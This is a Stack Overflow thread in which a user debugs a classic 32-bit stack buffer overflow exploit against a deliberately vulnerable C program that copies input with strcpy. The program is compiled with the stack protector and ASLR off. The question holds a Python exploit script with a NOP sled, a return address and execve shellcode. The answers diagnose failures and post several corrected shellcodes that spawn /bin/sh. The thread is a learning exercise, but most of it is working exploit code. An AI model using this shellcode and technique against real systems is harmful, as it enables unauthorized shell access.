-1

I'm executing a 32bit program (my arch is 64bit).

Vulnerable code:

#include <string.h>
#include <stdio.h>
void main(int argc, char *argv[]) {
    copier(argv[1]);
    printf("Done!\n");
}
int copier(char *str) {
    char buffer[100];
    strcpy(buffer, str);
}


Exploit:

#!/usr/bin/python3

ret = b"\xb0\xcd\xff\xff"
shellcode = (b"\xeb\x1d\x5e\x8d\x46\x05\x31\xdb\x88\x5e\x09\x89\x70\x05\x89\x5e\x0e\x8d"
             b"\x1e\x8d\x48\x05\x8d\x50\x09\x31\xc0\xb0\x0b\xcd\x80\xe8\xde\xff\xff\xff"
             b"\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43")

payload = b"\x90"*40+ shellcode + b"A"*(112 - 40 - len(shellcode)) + ret

open("bo1.payload", "wb").write(payload)


But when exploiting, it doesn't. When executed outside debugger there is a SegmentFault error.
Before int 0x80
Just after int 0x80
Q1 I think this is because the execve replaced the previouse code. Is that?
so i pressed 'q' and the command 'dc' to continue. 

[0xf7dd7c30]> dc
Selecting and continuing: 16145
child stopped with signal 17
[+] SIGNAL 17 errno=0 addr=0x3e80000546d code=1 ret=0
got signal...
[+] signal 17 aka SIGCHLD received 0

[3]+  Arrêté                r2 -d ./bo1 $(cat bo1.payload)


Q2 Why 'child stopped with signal 17' and no shell prompted after int 0x80?

Edit:
ASLR sysctl -w kernel.randomize_va_space=0
compiled with 'gcc -g -fno-stack-protector -z execstack -m32 -o bo1 bo1.c'

Edit2:
Apparently the problem is in the shellcodes. I tried all these, only the last one works and prompted the shell. 

shellcode = (b"\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
             b"\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80"
             b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80")

shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
             b"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")

shellcode = (b"\x31\xc0\xb0\x01\x31\xdb\xcd\x80")

shellcode = (b"\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\x8d\x1e\x8d\x4e"
             b"\x0a\x8d\x56\x0e\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
             b"\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43")

shellcode = (b"\xeb\x1d\x5e\x8d\x46\x05\x31\xdb\x88\x5e\x09\x89\x70\x05\x89\x5e\x0e\x8d"
             b"\x1e\x8d\x48\x05\x8d\x50\x09\x31\xc0\xb0\x0b\xcd\x80\xe8\xde\xff\xff\xff"
             b"\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43")

shellcode = (b"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2"
             b"\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
             b"\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80")
Tosi Do
  • 113
  • 1
  • 4
  • Presumably whatever system call you attempted failed, and your code doesn't handle that. This is not an [MCVE], it's hard to tell anything more from this much information. – Jester Jun 29 '17 at 14:42
  • What OS are you using? Operating system's anti exploit mitigation technology might have stopped it too. For example security cookie etc – Asesh Jun 30 '17 at 08:06
  • @Asesh : I'm on GNU/Linux 4.11.
    randomize_va_space=0.
    compiled with 'gcc -g -fno-stack-protector -z execstack -m32 -o bo1 bo1.c'     – Tosi Do Jun 30 '17 at 09:00
  • I thought that it's the describe problem [https://stackoverflow.com/questions/2859127/shellcode-for-a-simple-stack-overflow-exploited-program-with-shell-terminates-d?rq=1], then i tried Aralox shellcode but no effect, **signal 17** – Tosi Do Jun 30 '17 at 09:12
  • Consider disabling ASLR. – Thiner Jun 30 '17 at 09:27
  • @Thiner : it is. – Tosi Do Jun 30 '17 at 09:42

2 Answers2

2

The reason itself is easy enough to explain, just the push instructions in the shellcode erased the ending bytes of shellcode (noticed the eip is on stack and very near esp, right?) prefix the shellcode with "add esp, 0x70" is enough in most times.

However, I think you need to learn how to debug the program before asking questions. Use gdb, learn some assembly, and learn how shellcode works, so that you can know how it does not work.

For example in shellcode1 it ends with \xcd\x80 which is int 0x80. But when you debug, the final int 0x80 disappears before the final execve call completed. That is strange, therefore one need to consider what had modified the shellcode.

Thiner
  • 345
  • 1
  • 9
  • shellcode1 dies because of this, shellcode2 dies because execve(filename, argv, envp) envp is not a valid pointer array or NULL. shellcode3 does not pop a shell, it is just exit(0) – Thiner Jun 30 '17 at 12:49
  • thank you for this: _However, I think you need to learn how to debug the program before asking questions. Use gdb, learn some assembly, and learn how shellcode works, so that you can know how it does not work._ Apparently I did not find how the shellcodes did not work. – Tosi Do Jun 30 '17 at 17:10
0

### 'add esp, 70' at begining. Bad bytes '0x27', I replaced it by '0x26' and incremented 'ch'
shellcode1 = (b"\x83\xc4\x70\x31\xc0\x31\xdb\xb0\x06\xcd\x80"
             b"\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x26\xfe\xc5\xb0\x05\xcd\x80"
             b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80")

### Correct edx so it references NULL
shellcode2 = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
             b"\x6e\x89\xe3\x50\x53\x89\xe1\x8d\x54\x24\x04\xb0\x0b\xcd\x80")

### I could not see it exiting due the difference of stack frame offset between r2 and bash shell
shellcode3 = (b"\x31\xc0\xb0\x01\x31\xdb\xcd\x80")

### Containing a bad byte '\x0a'
shellcode4 = (b"\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\x8d\x1e\x8d\x4e"
             b"\x0a\x8d\x56\x0e\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
             b"\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43")

### Spawn /bin/sh instead of /bin/bash
shellcode5 = (b"\xeb\x1d\x5e\x8d\x46\x03\x31\xdb\x88\x5e\x07\x89\x70\x05\x89\x5e\x0c\x8d"
             b"\x1e\x8d\x48\x05\x8d\x50\x09\x31\xc0\xb0\x0b\xcd\x80\xe8\xde\xff\xff\xff"
             b"\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"

### The correct one
shellcode6 = (b"\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2"
             b"\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
             b"\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80")
Tosi Do
  • 113
  • 1
  • 4
  • Could you please describe what difference the correct one / last one contains compared to the others? – xuiqzy Oct 26 '21 at 15:18